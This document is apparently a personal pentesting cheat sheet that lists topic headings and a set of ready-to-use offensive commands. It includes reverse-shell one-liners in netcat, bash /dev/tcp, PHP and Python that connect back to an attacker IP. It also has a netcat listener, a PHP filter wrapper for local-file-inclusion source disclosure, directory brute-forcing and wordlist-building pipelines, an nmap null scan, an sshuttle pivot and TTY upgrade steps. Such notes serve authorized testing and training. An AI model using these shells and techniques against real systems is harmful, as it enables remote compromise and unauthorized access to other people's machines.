
A lot of tools and resources I've gathered for pentesting


Resources

A collection of links and payloads I stored for quick access

LINKS

Overviews

Windows Pentesting

Microsoft SQL Server

Windows Privilege Escalation

ACTIVE DIRECTORY

Credentials Dumping

Hash Cracking

Log4J

Metasploit Framework

Payloads

Reverse Engineering

Linux Privilege Escalation

PIVOTING && TUNNELING

Shells

Tools

Payloads

SSHuttle connection

sshuttle -vr balthazar@10.10.110.100 172.16.1.0/24 -x 172.16.1.100

PHP Wrapper

php://filter/convert.base64-encode/resource=

Profiling Password Lists

CEWL

1. DIRECTORY BRUTEFORCING
feroxbuster -eknr --wordlist $HOME/tools/crimson/words/dir -u https://<target_domain>/ -o ferox.txt
2. PREPARE FIRST PART OF THE cewl.txt
cat ferox.txt | grep 200 | grep -v "png\|\.js" | cut -d "h" -f2-100 | sed "s/^/h/g" >> urls.txt
for url in $(cat urls.txt); do echo $url && cewl -d 5 $url >> temp_cewl.txt;done
cat temp_cewl.txt | sort -u >> cewl.txt && rm temp_cewl.txt

Nmap

Null Scan

nmap -n -sN 10.10.110.0/24

Local Webserver

Python

python -m SimpleHTTPServer
python3 -m http.server

PHP

php -S 0.0.0.0:8000

Shells

Set Listener

nc -lnvp 4000

Netcat

nc -e /bin/sh 10.10.15.22 4000

PHP

<?php $sock = fsockopen("ip","port");$proc = proc_open("/bin/sh -i", array(0=>$sock,1=>$sock,2=>$sock),$pipes);?>

Bash

bash -i >& /dev/tcp/10.10.15.22/4000 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Interactive Shell

Bash

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg